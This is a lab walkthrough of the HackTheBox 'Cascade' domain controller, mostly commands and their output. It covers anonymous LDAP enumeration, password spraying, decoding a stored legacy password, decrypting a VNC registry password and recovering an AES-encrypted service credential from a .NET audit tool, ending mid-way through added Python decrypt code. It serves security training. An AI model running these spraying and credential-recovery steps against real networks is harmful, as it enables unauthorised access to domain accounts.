#LDAP_anonymous_binds #sqlite #VNC #.NET #AD_Recycle_Bin #PasswordReuse
Target IP once the box is up: 10.10.10.182
Nmap Scan
All TCP ports:
sudo nmap -p- --min-rate 2000 10.10.10.182 -vvv -oA Scan/ports
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49155/tcp open unknown syn-ack ttl 127
49157/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49170/tcp open unknown syn-ack ttl 127
grep open Scan/ports.nmap | cut -d / -f1 | paste -sd ','
53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170
ports=`grep open Scan/ports.nmap | cut -d / -f1 | paste -sd ','`
Ports 53, 88, 389 and 3268 are open (DNS, Kerberos, LDAP, Global Catalog), so this is a domain controller, not just a domain-joined host.
Default scripts and version detection against the open ports:
sudo nmap -sCV -O -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 10.10.10.182 -oA Scan/detail
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 14:39:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-07T14:40:40
|_ start_date: 2024-01-07T14:34:41
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.62 seconds
Add cascade.local (and the host name CASC-DC1) to /etc/hosts.
LDAP Anonymous
SMB is not reachable without credentials; a Guest session gets nothing:
smbmap -H 10.10.10.182 -u 'Guest' -p ''
LDAP, however, accepts anonymous binds, so the whole directory can be enumerated without an account:
ldapsearch -x -H ldap://10.10.10.182 -b 'dc=cascade,dc=local'
AS-REP roasting enumeration:
impacket-GetNPUsers -dc-ip 10.10.10.182 cascade.local/
Kerberoasting enumeration (this needs a valid domain account to query SPNs, so without credentials it cannot return anything yet):
impacket-GetUserSPNs -dc-ip 10.10.10.182 cascade.local/
PasswordSpray
Enumerate every domain user. GetADUsers is convenient here because it also shows the last logon time, which separates accounts that are actually used from the rest:
impacket-GetADUsers -dc-ip 10.10.10.182 cascade.local/ -all
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying 10.10.10.182 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ----- ------------------- -------------------
CascGuest <never> <never>
arksvc 2020-01-09 11:18:20.217288 2020-01-29 16:05:40.988784
s.smith 2020-01-28 14:58:05.485736 2020-01-28 18:26:39.084234
r.thompson 2020-01-09 14:31:26.263625 2020-01-28 20:11:52.571323
util 2020-01-12 21:07:11.195585 2020-01-28 13:09:47.107123
j.wakefield 2020-01-09 15:34:44.415012 <never>
s.hickson 2020-01-12 20:24:27.800396 <never>
j.goodhand 2020-01-12 20:40:26.032079 <never>
a.turnbull 2020-01-12 20:43:13.357973 <never>
e.crowe 2020-01-12 22:45:02.166946 <never>
b.hanson 2020-01-13 11:35:39.153866 <never>
d.burman 2020-01-13 11:36:12.959125 <never>
BackupSvc 2020-01-13 11:37:03.191213 <never>
j.allen 2020-01-13 12:23:59.916560 <never>
i.croft 2020-01-15 16:46:21.865201 <never>
ldapsearch can do the same with a filter that keeps only users whose lastLogonTimestamp is set (>= 1), i.e. accounts that have logged on at least once:
ldapsearch -x -H ldap://10.10.10.182 -b 'dc=cascade,dc=local' '(&(objectcategory=user)(lastLogonTimestamp>=1))' > ldap_lastlogon_user.txt
ldapsearch -x -H ldap://10.10.10.182 -b 'dc=cascade,dc=local' '(objectcategory=user)' > ldap_user.txt
Extract the user lists (crackmapexec, rpcclient or enum4linux would give the same result):
grep -i 'samaccountname' ldap_user.txt | awk -F': ' '{print $2}' > users.txt
grep -i 'samaccountname' ldap_lastlogon_user.txt | awk -F ': ' '{print $2}' > lastlogon_user.txt
Check the password policy before spraying: Account Lockout Threshold is None, so failed attempts never lock an account, and the minimum password length is only 5.
crackmapexec smb 10.10.10.182 --pass-pol
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] Dumping password info for domain: CASCADE
SMB 10.10.10.182 445 CASC-DC1 Minimum password length: 5
SMB 10.10.10.182 445 CASC-DC1 Password history length: None
SMB 10.10.10.182 445 CASC-DC1 Maximum password age: Not Set
SMB 10.10.10.182 445 CASC-DC1
SMB 10.10.10.182 445 CASC-DC1 Password Complexity Flags: 000000
SMB 10.10.10.182 445 CASC-DC1 Domain Refuse Password Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Store Cleartext: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Lockout Admins: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password No Clear Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password No Anon Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Complex: 0
SMB 10.10.10.182 445 CASC-DC1
SMB 10.10.10.182 445 CASC-DC1 Minimum password age: None
SMB 10.10.10.182 445 CASC-DC1 Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.182 445 CASC-DC1 Locked Account Duration: 30 minutes
SMB 10.10.10.182 445 CASC-DC1 Account Lockout Threshold: None
SMB 10.10.10.182 445 CASC-DC1 Forced Log off Time: Not Set
Password spraying is therefore safe, but every attempt below failed.
kerbrute passwordspray -d cascade.local --dc cascade.local users.txt --user-as-pass
crackmapexec ldap 10.10.10.182 -u '' -p '' -d cascade.local
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.182 445 CASC-DC1 [-] cascade.local\: Error connecting to the domain, are you sure LDAP service is running on the target ?
crackmapexec smb 10.10.10.182 -u lastlogon_user.txt -p lastlogon_user.txt --continue-on-success
(Without --no-bruteforce this tries the full user x password cross product; add it to pair each user only with its own line.)
Legacy
Username-as-password attempts all failed. The only thing usable so far is still anonymous LDAP, so go back through the ldapsearch output attribute by attribute:
ldapsearch -x -H ldap://10.10.10.182 -b 'dc=cascade,dc=local' '(objectcategory=user)'
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=
The r.thompson entry carries an attribute that no other user has.

cascadeLegacyPwd reads as "legacy password", i.e. an old password. The value is base64:
echo clk0bjVldmE= | base64 -d
rY4n5eva
Spray the decoded value against the known users:
crackmapexec smb 10.10.10.182 -u lastlogon_user.txt -p rY4n5eva --continue-on-success
kerbrute passwordspray -d cascade.local --dc cascade.local users.txt rY4n5eva
r.thompson never rotated the "legacy" password; it is still valid.

r.thompson is a member of the IT group but not of Remote Management Users, so WinRM (5985) is not available with this account:
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
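The cascadeLegacyPwd attribute above was found by reading the LDIF by eye. The following is an added example, not part of the original writeup, that does the same triage automatically: parse ldapsearch output (including LDIF continuation lines and "attr:: base64" values, both of which defeat a plain grep), keep the user objects, flag any attribute outside a stock AD user's attribute set, and try base64 on each flagged value. The same check applies later to the deleted TempAdmin object, which carries the same attribute. The sample LDIF is constructed to mirror the relevant lines of this box; the DNs and the s.smith description value are made up for the demonstration, and COMMON_USER_ATTRS is this example's own list of what a normal user object carries.

```python
import base64
import re

# Attributes a plain AD user object normally carries (assumption of this example).
# Anything outside this set is worth a second look; cascadeLegacyPwd is the one that mattered here.
COMMON_USER_ATTRS = {
    "dn", "objectClass", "cn", "sn", "givenName", "distinguishedName", "instanceType",
    "whenCreated", "whenChanged", "displayName", "uSNCreated", "uSNChanged", "memberOf",
    "name", "objectGUID", "userAccountControl", "badPwdCount", "codePage", "countryCode",
    "badPasswordTime", "lastLogoff", "lastLogon", "pwdLastSet", "primaryGroupID",
    "objectSid", "accountExpires", "logonCount", "sAMAccountName", "sAMAccountType",
    "userPrincipalName", "objectCategory", "dSCorePropagationData", "lastLogonTimestamp",
    "scriptPath",
}

# Constructed sample of `ldapsearch -x ... '(objectcategory=user)'` output.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <dc=cascade,dc=local> with scope subtree
# filter: (objectcategory=user)

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
sAMAccountName: r.thompson
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=

# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: user
sAMAccountName: s.smith
memberOf: CN=Remote Management Users,CN=Builtin,DC=cascade,DC=local
description:: SGVsbG8gd29ybGQ=

# search result
search: 2
result: 0 Success
"""

def parse_ldif(text):
    """Turn LDIF text into a list of {attribute: [values]} dicts.

    A line starting with a single space continues the previous attribute value;
    'attr:: <b64>' is an LDIF base64-wrapped value (binary, or value with leading space).
    """
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)
    entries, current = [], None
    for line in unfolded:
        if not line.strip():
            if current:
                entries.append(current)
            current = None
            continue
        if line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z][\w\-.;]*)(::?) ?(.*)$", line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current = current if current is not None else {}
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries

def user_entries(entries):
    """Keep real objects (they have a dn) whose objectClass includes user."""
    return [e for e in entries if "dn" in e and "user" in e.get("objectClass", [])]

def looks_like_base64(value):
    return len(value) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value) is not None

def decode_candidates(entry, known=COMMON_USER_ATTRS):
    """For every non-standard attribute, try base64 and keep printable UTF-8 results."""
    found = {}
    for attr, values in entry.items():
        if attr in known:
            continue
        for v in values:
            if not looks_like_base64(v):
                continue
            try:
                plain = base64.b64decode(v, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # real ciphertext or binary: not a stored plaintext
            if plain.isprintable():
                found[attr] = plain
    return found

def triage(ldif_text):
    """Return [(sAMAccountName, {attr: decoded value})] for users with findings."""
    out = []
    for u in user_entries(parse_ldif(ldif_text)):
        hits = decode_candidates(u)
        if hits:
            out.append((u["sAMAccountName"][0], hits))
    return out

if __name__ == "__main__":
    for sam, hits in triage(SAMPLE_LDIF):
        print(sam, hits)
```

Run it against a saved ldap_user.txt by reading the file instead of SAMPLE_LDIF; anything it prints is a candidate for spraying, and values that fail the base64/UTF-8 check (like the AES ciphertext found later in Audit.db) are deliberately left out rather than reported as passwords.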
SMB
Given the open ports, this credential is only good for SMB (and authenticated LDAP):
crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
Data
Look at Data, the only readable share that is not a default one:
smbclient -U 'r.thompson%rY4n5eva' //10.10.10.182/Data
Try "help" to get a list of possible commands.
6553343 blocks of size 4096. 1625204 blocks available
smb: \> recurse
smb: \> dir
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
# Files worth downloading
\IT\Email Archives
. D 0 Tue Jan 28 13:00:30 2020
.. D 0 Tue Jan 28 13:00:30 2020
Meeting_Notes_June_2018.html An 2522 Tue Jan 28 13:00:12 2020
\IT\Logs
. D 0 Tue Jan 28 19:53:04 2020
.. D 0 Tue Jan 28 19:53:04 2020
Ark AD Recycle Bin D 0 Fri Jan 10 11:33:45 2020
DCs D 0 Tue Jan 28 19:56:00 2020
\IT\Logs\Ark AD Recycle Bin
. D 0 Fri Jan 10 11:33:45 2020
.. D 0 Fri Jan 10 11:33:45 2020
ArkAdRecycleBin.log A 1303 Tue Jan 28 20:19:11 2020
\IT\Logs\DCs
. D 0 Tue Jan 28 19:56:00 2020
.. D 0 Tue Jan 28 19:56:00 2020
dcdiag.log A 5967 Fri Jan 10 11:17:30 2020
\IT\Temp\s.smith
. D 0 Tue Jan 28 15:00:01 2020
.. D 0 Tue Jan 28 15:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 14:27:44 2020
Download all of the above and review them locally.
Files
- Meeting_Notes_June_2018.html
From: Steve Smith
To: IT (Internal)
Sent: 14 June 2018 14:07
Subject: Meeting Notes
For anyone that missed yesterday’s meeting (I’m looking at you Ben). Main points are below:
-- New production network will be going live on Wednesday so keep an eye out for any issues.
-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).
-- The winner of the “Best GPO” competition will be announced on Friday so get your submissions in soon.
Stev
Username is TempAdmin (password is the same as the normal admin account password).
User
TempAdmin's password was the same as the administrator's, but that account has since been deleted.
- VNC Install.reg
A registry export:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
It contains a stored VNC password:
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
Decrypt
Search: "Decrypting a Hex code from VNC install Registry" or "VNC password decrypt":
frizb/PasswordDecrypts: Handy Stored Password Decryption Techniques
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
6bcf2a4b6e5aca0f
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
sT333ve2
On OpenSSL 3.x single DES lives in the legacy provider, so the same command needs -provider legacy -provider default appended or it fails with "unsupported". The key e84ad660c4721ae0 is VNC's hard-coded password-obfuscation key with the bits of each byte reversed, which is how VNC's own DES routine consumes it; one 8-byte block in CBC with a zero IV is identical to ECB.
Spray it; the .reg file sat in \IT\Temp\s.smith, and the password indeed belongs to s.smith:
kerbrute passwordspray -d cascade.local --dc cascade.local lastlogon_user.txt sT333ve2
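Where the openssl key e84ad660c4721ae0 comes from, as an added example that is not part of the writeup: VNC servers "encrypt" the stored password with DES under one fixed key compiled into every VNC implementation (17 52 6b 06 23 4e 58 07), and the d3des routine VNC ships reads key bits LSB-first, so to reuse a standard DES such as openssl's each key byte must be bit-reversed. The helper below derives that key, pulls the Password value out of a .reg export (including the backslash-wrapped form Windows writes for long hex values; the sample .reg is constructed for that, the page's value was on one line), and emits the openssl invocation with the OpenSSL 3 legacy-provider flags. The DES step itself is left to openssl or vncpwd.

```python
import re

# Fixed key hard-coded in VNC's vncpasswd/d3des; it is not a secret.
VNC_FIXED_KEY = bytes([0x17, 0x52, 0x6B, 0x06, 0x23, 0x4E, 0x58, 0x07])

# Constructed .reg sample: a TightVNC Server key with the Password value wrapped
# across two lines the way regedit exports long hex values.
SAMPLE_REG = (
    'Windows Registry Editor Version 5.00\r\n'
    '\r\n'
    '[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]\r\n'
    '"RfbPort"=dword:0000170c\r\n'
    '"UseVncAuthentication"=dword:00000001\r\n'
    '"Password"=hex:6b,cf,2a,4b,\\\r\n'
    '  6e,5a,ca,0f\r\n'
)

def reverse_bits(b):
    """Reverse the bit order of a single byte (0x17 -> 0xE8)."""
    return int(f"{b:08b}"[::-1], 2)

def openssl_des_key(fixed_key=VNC_FIXED_KEY):
    """Hex DES key for a standard implementation: each VNC key byte bit-reversed."""
    return bytes(reverse_bits(b) for b in fixed_key).hex()

def reg_hex_values(reg_text, value_name):
    """Map registry key path -> bytes for every 'value_name'=hex:... in a .reg export.

    A trailing backslash continues the value on the next line; those are joined first.
    """
    text = reg_text.replace("\\\r\n", "").replace("\\\n", "")
    pattern = re.compile(r'"%s"=hex:([0-9a-fA-F,\s]+)$' % re.escape(value_name))
    results, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = pattern.match(line)
        if m and key:
            results[key] = bytes.fromhex(re.sub(r"[,\s]", "", m.group(1)))
    return results

def openssl_command(enc_pw):
    """Command that recovers the plaintext: single-block DES, zero IV, no padding.

    OpenSSL 3 moved single DES into the legacy provider, hence the -provider flags;
    OpenSSL 1.1 does not know that option and works without it.
    """
    if len(enc_pw) != 8:
        raise ValueError("VNC stores exactly one 8-byte DES block")
    return (f"echo -n {enc_pw.hex()} | xxd -r -p | "
            f"openssl enc -d -des-cbc -nopad -nosalt -K {openssl_des_key()} "
            f"-iv 0000000000000000 -provider legacy -provider default")

if __name__ == "__main__":
    for path, value in reg_hex_values(SAMPLE_REG, "Password").items():
        print(path)
        print(openssl_command(value))
```

The ControlPassword value, if present in a TightVNC export, is obfuscated the same way and can be fed through the same command.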
Initial Access
Audit
evil-winrm -i cascade.local -u s.smith -p sT333ve2
smbclient -U 's.smith%sT333ve2' //10.10.10.182/Audit$
smb: \> recurse
smb: \> dir
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
\DB
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
...
smb: \> cd db
smb: \db\> dir
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
6553343 blocks of size 4096. 1624946 blocks available
smb: \db\> prompt
smb: \db\> get Audit.db
getting file \db\Audit.db of size 24576 as Audit.db (39.3 KiloBytes/sec) (average 39.3 KiloBytes/sec)
On the target (evil-winrm session as s.smith):
net use '\\localhost\Audit$'
The command completed successfully.
# Checking the ACL for a DLL-hijacking opportunity; exploiting one would also need something (a scheduled task) to run the binary
icacls '\\localhost\Audit$'
\\localhost\Audit$ CASCADE\Audit Share:(OI)(CI)(RX)
CREATOR OWNER:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
List the share contents:
dir '\\localhost\Audit$'
Directory: \\localhost\Audit$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/28/2020 9:40 PM DB
d----- 1/26/2020 10:25 PM x64
d----- 1/26/2020 10:25 PM x86
-a---- 1/28/2020 9:46 PM 13312 CascAudit.exe
-a---- 1/29/2020 6:00 PM 12288 CascCrypto.dll
-a---- 1/28/2020 11:29 PM 45 RunAudit.bat
-a---- 10/27/2019 6:38 AM 363520 System.Data.SQLite.dll
-a---- 10/27/2019 6:38 AM 186880 System.Data.SQLite.EF6.dll
RunAudit.bat just runs CascAudit.exe with Audit.db as its argument:
type '\\localhost\Audit$\RunAudit.bat'
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
DB
Audit.db is the highest-priority file: a database is the most likely place for credentials. Download it; System.Data.SQLite.dll next to it shows the format, so open it with sqlite3:
sqlite3 Audit.db
SQLite version 3.44.0 2023-11-01 11:23:50
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Ldap" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"uname" TEXT,
"pwd" TEXT,
"domain" TEXT
);
INSERT INTO Ldap VALUES(1,'ArkSvc','BQO5l5Kj9MdErXx6Q6AGOw==','cascade.local');
CREATE TABLE IF NOT EXISTS "Misc" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"Ext1" TEXT,
"Ext2" TEXT
);
CREATE TABLE IF NOT EXISTS "DeletedUserAudit" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"Username" TEXT,
"Name" TEXT,
"DistinguishedName" TEXT
);
INSERT INTO DeletedUserAudit VALUES(6,'test',replace('Test\nDEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d','\n',char(10)),'CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(7,'deleted',replace('deleted guy\nDEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef','\n',char(10)),'CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(9,'TempAdmin',replace('TempAdmin\nDEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a','\n',char(10)),'CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local');
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('Ldap',2);
INSERT INTO sqlite_sequence VALUES('DeletedUserAudit',10);
COMMIT;
Extracted username and password:
'ArkSvc','BQO5l5Kj9MdErXx6Q6AGOw=='
base64-decoding the value yields binary garbage (it is ciphertext, not an encoded string), and using it verbatim as the password fails too:
crackmapexec smb 10.10.10.182 -u 'ArkSvc' -p 'BQO5l5Kj9MdErXx6Q6AGOw=='
Decrypt
RunAudit.bat executes CascAudit.exe, so the decryption logic is most likely in that binary. Download CascAudit.exe and CascCrypto.dll and open them in dnSpy:
MainModule contains the call into the decryption routine, with the key passed as a string literal:

string encryptedString = Conversions.ToString(sqliteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
}
Clicking the function name jumps to its definition in CascCrypto.dll:

DecryptString spells out the AES parameters (IV, CBC mode, 128-bit key size) and the key is the literal passed by the caller. Trivial reversing; everything needed to decrypt is now known:
public static string DecryptString(string EncryptedString, string Key)
{
byte[] array = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
aes.Key = Encoding.UTF8.GetBytes(Key);
string @string;
using (MemoryStream memoryStream = new MemoryStream(array))
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] array2 = new byte[checked(array.Length - 1 + 1)];
cryptoStream.Read(array2, 0, array2.Length);
@string = Encoding.UTF8.GetString(array2);
}
}
return @string;
}
// Token: 0x04000006 RID: 6
public const string DefaultIV = "1tdyjCbY1Ix49842";
// Token: 0x04000007 RID: 7
public const int Keysize = 128;
}
string = BQO5l5Kj9MdErXx6Q6AGOw==
IV = "1tdyjCbY1Ix49842"
key = "c4scadek3y654321"
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
Decrypt with any AES tool (CyberChef's AES Decrypt with key and IV entered as UTF-8, CBC mode):
AES decrypted output (Base64):
dzNsYzBtZUZyMzFuZA==
Plain Text:
w3lc0meFr31nd
Verify:
crackmapexec smb 10.10.10.182 -u 'ArkSvc' -p 'w3lc0meFr31nd'
evil-winrm -i cascade.local -u 'ArkSvc' -p 'w3lc0meFr31nd'
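The decompiled routine fixes every parameter: AES with a 128-bit key taken from the UTF-8 bytes of "c4scadek3y654321", the constant IV "1tdyjCbY1Ix49842", CBC mode, and the .NET default PKCS#7 padding, which the decompiled code never states explicitly. The following is an added example, not from the writeup or the CascAudit tool, that re-implements exactly that decrypt in dependency-free Python so it runs anywhere (S-boxes are generated at import rather than typed in; in practice you would use pycryptodome or cryptography) and validates the PKCS#7 padding instead of returning the trailing NUL bytes that the original Read(array.Length) pattern leaves in the string.

```python
import base64

# --- minimal AES-128, decrypt side only (FIPS-197) ---

def _xtime(a):
    """Multiply by x in GF(2^8) with the AES polynomial x^8+x^4+x^3+x+1."""
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a

def _gmul(a, b):
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r

def _build_sboxes():
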